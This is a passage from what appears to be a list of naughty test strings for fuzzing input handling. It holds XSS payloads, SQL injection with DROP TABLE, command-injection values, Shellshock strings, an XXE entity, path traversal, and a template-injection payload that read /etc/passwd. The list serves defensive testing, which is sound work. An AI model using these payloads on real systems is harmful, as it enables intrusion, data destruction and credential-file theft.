  381. "<img src=x\\x13onerror=\"javascript:alert(1)\">",
  382. "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">",
  383. "<img src=x onerror=\\x09\"javascript:alert(1)\">",
  384. "<img src=x onerror=\\x10\"javascript:alert(1)\">",
  385. "<img src=x onerror=\\x11\"javascript:alert(1)\">",
  386. "<img src=x onerror=\\x12\"javascript:alert(1)\">",
  387. "<img src=x onerror=\\x32\"javascript:alert(1)\">",
  388. "<img src=x onerror=\\x00\"javascript:alert(1)\">",
  389. "<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>",
  390. "<img src=\"x` `<script>javascript:alert(1)</script>\"` `>",
  391. "<img src onerror /\" '\"= alt=javascript:alert(1)//\">",
  392. "<title onpropertychange=javascript:alert(1)></title><title title=>",
  393. "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">",
  394. "<!--[if]><script>javascript:alert(1)</script -->",
  395. "<!--[if<img src=x onerror=javascript:alert(1)//]> -->",
  396. "<script src=\"/\\%(jscript)s\"></script>",
  397. "<script src=\"\\\\%(jscript)s\"></script>",
  398. "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">",
  399. "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
  400. "<IMG SRC=# onmouseover=\"alert('xxs')\">",
  401. "<IMG SRC= onmouseover=\"alert('xxs')\">",
  402. "<IMG onmouseover=\"alert('xxs')\">",
  403. "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
  404. "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",
  405. "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
  406. "<IMG SRC=\"jav ascript:alert('XSS');\">",
  407. "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
  408. "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
  409. "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
  410. "perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out",
  411. "<IMG SRC=\" &#14; javascript:alert('XSS');\">",
  412. "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
  413. "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
  414. "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
  415. "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
  416. "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >",
  417. "<SCRIPT SRC=//ha.ckers.org/.j>",
  418. "<IMG SRC=\"javascript:alert('XSS')\"",
  419. "<iframe src=http://ha.ckers.org/scriptlet.html <",
  420. "\\\";alert('XSS');//",
  421. "<u oncopy=alert()> Copy me</u>",
  422. "<i onwheel=alert(1)> Scroll over me </i>",
  423. "<plaintext>",
  424. "http://a/%%30%30",
  425. "</textarea><script>alert(123)</script>",
  426. "1;DROP TABLE users",
  427. "1'; DROP TABLE users-- 1",
  428. "' OR 1=1 -- 1",
  429. "' OR '1'='1",
  430. "'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --",
  431. " ",
  432. "%",
  433. "_",
  434. "--",
  435. "--version",
  436. "--help",
  437. "$USER",
  438. "/dev/null; touch /tmp/blns.fail ; echo",
  439. "`touch /tmp/blns.fail`",
  440. "$(touch /tmp/blns.fail)",
  441. "@{[system \"touch /tmp/blns.fail\"]}",
  442. "eval(\"puts 'hello world'\")",
  443. "System(\"ls -al /\")",
  444. "`ls -al /`",
  445. "Kernel.exec(\"ls -al /\")",
  446. "Kernel.exit(1)",
  447. "%x('ls -al /')",
  448. "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
  449. "$HOME",
  450. "$ENV{'HOME'}",
  451. "%d",
  452. "%s%s%s%s%s",
  453. "{0}",
  454. "%*.*s",
  455. "%@",
  456. "%n",
  457. "File:///",
  458. "../../../../../../../../../../../etc/passwd%00",
  459. "../../../../../../../../../../../etc/hosts",
  460. "() { 0; }; touch /tmp/blns.shellshock1.fail;",
  461. "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }",
  462. "<<< %s(un='%s') = %u",
  463. "+++ATH0",
  464. "The quic\b\b\b\b\b\bk brown fo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x... [Beeeep]",
  465. "Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗",
  466. "🏳0🌈️",
  467. "జ్ఞ‌ా",
  468. "گچپژ",
  469. "{% print 'x' * 64 * 1024**3 %}",
  470. "{{ \"\".__class__.__mro__[2].__subclasses__()[40](\"/etc/passwd\").read() }}"
  471. ]